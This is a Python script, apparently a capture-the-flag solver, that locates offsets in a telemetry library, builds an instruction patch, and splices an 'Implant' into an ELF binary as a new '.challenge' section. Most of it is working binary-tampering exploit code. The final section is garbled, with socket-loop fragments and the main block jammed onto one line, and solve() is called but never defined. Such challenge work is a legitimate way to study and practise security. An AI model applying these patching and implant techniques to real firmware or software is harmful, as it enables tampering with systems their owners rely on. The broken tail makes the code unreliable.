def findOffsets():
    """Locate two code positions in kit_to.so relative to PKTMGR_OutputTelemetry.

    The library is opened from ``$DIR/kit_to.so`` (``DIR`` defaults to
    ``/data``).  Starting 0xF0 bytes past the ``PKTMGR_OutputTelemetry``
    symbol, the function scans forward one byte at a time for fixed byte
    sequences and returns ``(movAddr, patchOffset)``:

    * ``movAddr`` -- absolute address of the first ``0x8b`` byte found after
      the first matched sequence plus a further 5-byte skip;
    * ``patchOffset`` -- offset, relative to ``PKTMGR_OutputTelemetry``, of
      the byte immediately following the second matched sequence.

    Each scan runs until its pattern matches; no upper bound is applied, so a
    library that lacks these sequences never returns normally.  Progress is
    printed to stdout.
    """
    lib_path = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
    elf = ELF(lib_path)
    base = elf.symbols['PKTMGR_OutputTelemetry']
    print("PKTMGR_OutputTelemetry @ %08x" % base)

    def scan_forward(start, needle):
        # Advance the cursor until the bytes at the cursor equal ``needle``.
        cursor = start
        while elf.read(cursor, len(needle)) != needle:
            cursor += 1
        return cursor

    first_seq = unhexlify("8b8344010000" + "8db0fa010000")
    cursor = scan_forward(base + 0xF0, first_seq)
    # Skip past the matched sequence and 5 more bytes, then look for 0x8b.
    movAddr = scan_forward(cursor + 5 + len(first_seq), b'\x8b')

    second_seq = unhexlify("8d8b48010000" + "51" + "6a00" + "52")
    cursor = scan_forward(movAddr, second_seq)
    patchOffset = cursor + len(second_seq)
    return (movAddr, patchOffset - base)
def patch_old(f, data):
    """Splice ``data`` after the .text payload of ELF file ``f`` and register it.

    The original comment (cut short) says the patch is kept at the end of the
    file to avoid disturbing existing content.  Everything below operates on
    the raw bytes of ``f``; the ``ELF`` object is used only for symbol lookup,
    the header size and reads by virtual address.

    Steps:

    1. Read the header the script labels ".text Header", located
       ``e_ehsize`` bytes into the file: a big-endian 32-bit file offset at
       +4 and two big-endian 32-bit sizes at +0x10 and +0x14.
       NOTE(review): the layout matches a 32-bit ELF program header
       (p_offset, p_filesz, p_memsz) -- confirm against the target binary.
    2. Replace the bytes at ``offset + size`` with ``data`` and rewrite both
       size fields as ``size + len(data)``.  No check is made that the
       replaced range lies inside the file.
    3. Walk the table at the ``sections`` symbol -- 32-byte entries of four
       big-endian 32-bit words followed by a NUL-terminated 16-byte name --
       until an entry whose first two words are both zero, remembering the
       end of the last listed range.
    4. Round that end up to a 64 KiB boundary and write a new entry
       ``(first_free, implant_addr, len(data), 0, ".challenge")`` over the
       terminator entry.  The table address is turned into a file position by
       adding the .text file offset; no new terminator is written after it.
    5. Write the result to ``build/patched_<f>``.

    Args:
        f: path of the ELF file to read; it is also appended to the output
           name, so a path with directory components yields a nested output.
        data: bytes to splice in.

    Raises:
        ValueError: from ``bytes.index`` when a table entry name has no NUL.
    """
    with open(f, 'rb') as fd:
        raw = fd.read()
    elf = ELF(f)
    table_start = elf.symbols["sections"]
    hdr = elf.header.e_ehsize
    print(".text Header @ %08x" % hdr)
    (text_off,) = unpack(">I", raw[hdr + 4:hdr + 8])
    filesz, memsz = unpack(">II", raw[hdr + 0x10:hdr + 0x18])
    print("Original .text offset,size: %08x %x,%x" % (text_off, filesz, memsz))

    def splice(buf, pos, chunk):
        # Overwrite len(chunk) bytes of ``buf`` at ``pos`` with ``chunk``.
        return buf[:pos] + chunk + buf[pos + len(chunk):]

    implant_addr = text_off + filesz
    print("Writing Implant @ %08x" % implant_addr)
    raw = splice(raw, implant_addr, data)
    new_size = filesz + len(data)
    print("Updating size of .text to %x" % new_size)
    # Both size fields (at +0x10 and +0x14) receive the grown value.
    raw = splice(raw, hdr + 0x10, pack(">II", new_size, new_size))

    entry_len = 16 + 4 * 4
    print("Section start: %08x" % table_start)
    cursor = table_start
    last_end = 0
    while True:
        entry = elf.read(cursor, entry_len)
        paddr, raddr, plen, _comp = unpack(">IIII", entry[:4 * 4])
        raw_name = entry[4 * 4:]
        # Name is parsed before the terminator test, as in the original.
        name = raw_name[:raw_name.index(b'\x00')]
        if paddr == 0 and raddr == 0:
            break
        print("Section %s @ %08x:%08x" % (name, paddr, paddr + plen))
        last_end = paddr + plen
        cursor += entry_len

    first_free = (last_end + 0xFFFF) & ~0xFFFF
    print("First free, rounded: %x" % first_free)
    new_entry = pack(">IIII", first_free, implant_addr, len(data), 0) + b".challenge"
    print("Sections end: %08x" % cursor)
    raw = splice(raw, cursor + text_off, new_entry)
    with open("build/patched_" + f, "wb") as fd:
        fd.write(raw)
def findGoalPatch(movAddr):
    """Build a 4-byte replacement for the bytes found at ``movAddr``.

    Reads 6 bytes at ``movAddr`` from ``$DIR/kit_to.so`` (``DIR`` defaults to
    ``/data``), keeps bytes ``[2:4]`` of them and prefixes the fixed bytes
    ``8b 95``.  Both the bytes read and the resulting patch are printed in
    hex.

    Args:
        movAddr: address to read from, as returned by ``findOffsets``.

    Returns:
        The 4-byte patch as ``bytes``.
    """
    lib_path = os.getenv("DIR", "/data") + os.sep + "kit_to.so"
    elf = ELF(lib_path)
    original = elf.read(movAddr, 6)
    print("Mov Instruction", hexlify(original))
    # Only the first two bytes are replaced; bytes 2..3 of the original are
    # carried over unchanged.
    prefix = b"\x8b\x95"
    patch = prefix + original[2:4]
    print("Patch", hexlify(patch))
    return patch
break if "Closed" in data: sys.stdout.write("Terminated\n") sys.stdout.flush() break sock.close() return result if __name__ == "__main__": Host = os.getenv("HOST", "localhost") Port = int(os.getenv("PORT", 31340)) Ticket = os.getenv("TICKET", "") File = os.getenv("DIR", "/data") + os.sep + "test.elf" f = ELF(File) cookie = f.read(f.symbols['COOKIE'], 4) crc8 = crcmod.mkCrcFun(0x107, rev=False, initCrc=0x0, xorOut=0x00) solve(cookie) ''' Success = 0 Trials = 5000 for ii in range(0,Trials): if solve(): Success += 1 if ii % 25 == 24: print("%d/%d" % (Success, ii+1)) print("%d/%d" % (Success, Trials)) '''